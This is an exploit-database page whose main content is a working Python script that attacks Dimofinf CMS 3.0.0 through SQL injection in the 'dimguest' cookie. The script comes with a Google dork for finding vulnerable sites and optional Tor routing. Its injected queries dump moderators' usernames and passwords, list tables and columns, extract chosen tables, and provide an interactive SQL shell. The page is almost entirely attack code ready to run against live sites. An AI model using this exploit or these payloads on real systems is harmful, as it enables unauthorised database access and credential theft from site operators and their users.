Dimofinf 3.0.0 SQL Injection



EKU-ID: 5265 CVE: OSVDB-ID:
Author: D35m0nd142 Published: 2015-11-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Dimofinf CMS Automatic Cookie SQL Injection exploit
# Google Dork: intext:"Powered by Dimofinf"
# Date: 19/11/2015
# Author: D35m0nd142
# Software link: http://www.dimofinf.net
# Version: 3.0.0
# Tested on: Dimofinf version 3.0.0
# Sometimes it happens that the vulnerability allow you to get moderators' username and password but not the list of tables and columns 
# or viceversa; So if one of them does not work, you could try the other one anyway.

#!/usr/bin/python
import socks
import socket
import requests
import sys,os,time
from random import randint

check = "Duplicate entry '"
tor_addr = "127.0.0.1"
tor_port = 9150
agents = ["Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.132 Safari/537.36",
		  "IBM WebExplorer /v0.94","Mozilla/5.0 (Windows; U; Windows NT 6.1; x64; fr; rv:1.9.2.13) Gecko/20101203 Firebird/3.6.13",
		  "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"]
rand = randint(0,9)
url = ""
headers = {'User-Agent':agents[rand%len(agents)]}

def removeDot(s):
	return s[1:]

def extract(out):
	start = 0
	for x in range(0,len(out)-len(check)):
		beset = True
		for k in range(0,17):
			if(out[x+k] != check[k]):
				beset = False
		if(beset):
			start = x+17
			break
	got = ""
	for x in range(start,len(out)):
		if(out[x] == '~'):
			break
		got += out[x]
	return got

def req(cookies):
	global headers
	r = requests.get(url,cookies=cookie,headers=headers)
	out = r.text
	return out

print "\n-----------------------------------------------------------"
print "Dimofinf CMS v3.0.0 Automatic Cookie SQL Injection exploit"
print "Author: D35m0nd142"
print "-----------------------------------------------------------"

url = raw_input("\nEnter URL -> ") 
if("http" not in url):
	url = "http://%s" %url
tor = raw_input("Do you want to use TOR? (y/n) ")

if(tor == "y" or tor == "Y" or tor == "yes"):
	try:
		socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, tor_addr, tor_port)
		socket.socket = socks.socksocket
	except requests.ConnectionError as e:
		print "[ERROR] Could not connect to TOR"
		sys.exit(1)

session = requests.Session()
response = session.get(url)
s = str(session.cookies.get_dict())

if("dimguest" in s):
	i = 0
	print "\n[+] 'dimguest' cookie found. Checking exploitability.."
	cookie = {'dimguest':'1\''}
	r = requests.get(url,cookies=cookie,headers=headers)

	choice = "nope"
	if("Database Error" in r.text and "Invalid SQL" in r.text and "You have an error in your SQL" in r.text):
		print "[+] Target seems to be exploitable (SQL error found)."
		cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select user()),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#'}
		out = req(cookie)
		current = extract(out)

		if(len(current) < 70):
			print "[+] Current User: %s" %(removeDot(current))
		else:
			print "[+] Current User: ?"

		print "\n----------------------------------------"
		print " 1) Get moderators' usernames:passwords"
		print " 2) Browse DB (wizard)"
		print " 3) SQL shell (difficult)"
		print "----------------------------------------"
		choice = raw_input(" -> ")
		print ""

		if(choice == "1"):
			cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(username,0x3a,password) from moderators limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i}
			out = req(cookie)

			while(check in out):
				got = extract(out)

				if(len(got) > 0):
					print "[+] GOT: '%s'" %(removeDot(got))
				i += 1
				cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(username,0x3a,password) from moderators limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i}
				out = req(cookie)

		elif(choice == "2"):
			print "[*] Gathering tables..\n"
			
			cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(table_name) from information_schema.tables where table_schema=database() limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i}
			out = req(cookie)

			while(check in out):
				got = extract(out)
				if(len(got) > 0):
					print "[Table] '%s'" %(removeDot(got))
				i += 1
				cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(table_name) from information_schema.tables where table_schema=database() limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %i}
				out = req(cookie)

			if(i == 0):
				print "[-] Any table found :("
			
			tables = raw_input("\nEnter the tables (separated by ',') of which you want the columns -> ")
			mytables = []

			tmp = ""
			for x in range(0,len(tables)):
				if(tables[x] == ',' or x == len(tables)-1):
					if(x == len(tables)-1):
						tmp += tables[x]
					mytables.append(tmp)
					tmp = ""
				else:
					tmp += tables[x]

			for table in mytables:
				col_check = []
				k = 0
				print "\n[+] Columns in '%s':\n" %table
				cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(column_name) from information_schema.columns where table_name=\'%s\' limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %(table,k)}
				out = req(cookie)

				while(check in out):
					got = extract(out)
					if(got in col_check):
						break
					if(len(got) > 0):
						col_check.append(got)
						print "  [Column] '%s'" %(removeDot(got))
					k += 1
					cookie = {'dimguest':'1\' and (select 1 from (select count(*),concat(0x3a,(select Concat(column_name) from information_schema.columns where table_name=\'%s\' limit %s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#' %(table,k)}
					out = req(cookie)

			if(k == 0):
				print "[-] Any column found :("
			
			dump = "nope"
			while(dump != "exit" and dump != "quit"):
				dump = raw_input("\nEnter the table and columns you want to dump (ex: table_name:column1,column2) -> ")

				if(dump == "exit" or dump == "quit"):
					break
				gotTable = False
				table = ""
				cols = []
				col = ""
				for x in range(0,len(dump)):
					if(gotTable is False and dump[x] == ':'):
						gotTable = True
						x += 1
					if(gotTable is False):
						table += dump[x]
					else:
						if(dump[x] == ',' or x == len(dump)-1):
							if(x == len(dump)-1):
								col += dump[x]
							cols.append(col)
							col = ""
						else:
							col += dump[x]

				if(len(cols) > 0):
					cols[0] = (cols[0])[1:]
				print cols

				print "\n[*] Dumping..\n"

				query = "1' and (select 1 from (select count(*),concat(0x3a,(select Concat("
				for colu in cols:
					query += "%s,0x3a," %colu
				query = query[:-1]

				z = 0
				query += ") from %s limit " %table

				while(True):
					snip = "%s,1),0x7e,floor(rand(0)*2))a from information_schema.tables group by a)x)#" %z
					z += 1
					myquery = query+snip
					cookie = {'dimguest':myquery}	
					out = req(cookie)
					if(check not in out):
						break
					got = extract(out)
					print "[Dump]: '%s'" %(removeDot(got))
				print ""

		elif(choice == "3"):
			print "[*] Opening SQL shell..\n"
			time.sleep(0.6)
			cmd = ""
			while(cmd != "exit" and cmd != "quit"):
				cmd = raw_input("SQL-shell> ")
				if(cmd == "exit" or cmd == "quit"):
					break
				cookie = {'dimguest':'1\' and (%s)#' %cmd}
				out = req(cookie)
				got = extract(out)
				print "qui"
				print "[+] GOT: '%s'\n" %(removeDot(got))
		else:
			print "[INPUT ERROR] You entered a not valid choice!"
			sys.exit(1)

	if(i==0 and choice != "3"):
		print "[-] '%s' not vulnerable, or patched." %url

else:
	print "\n[+] Target not vulnerable. (cookie 'dimguest' not found.)"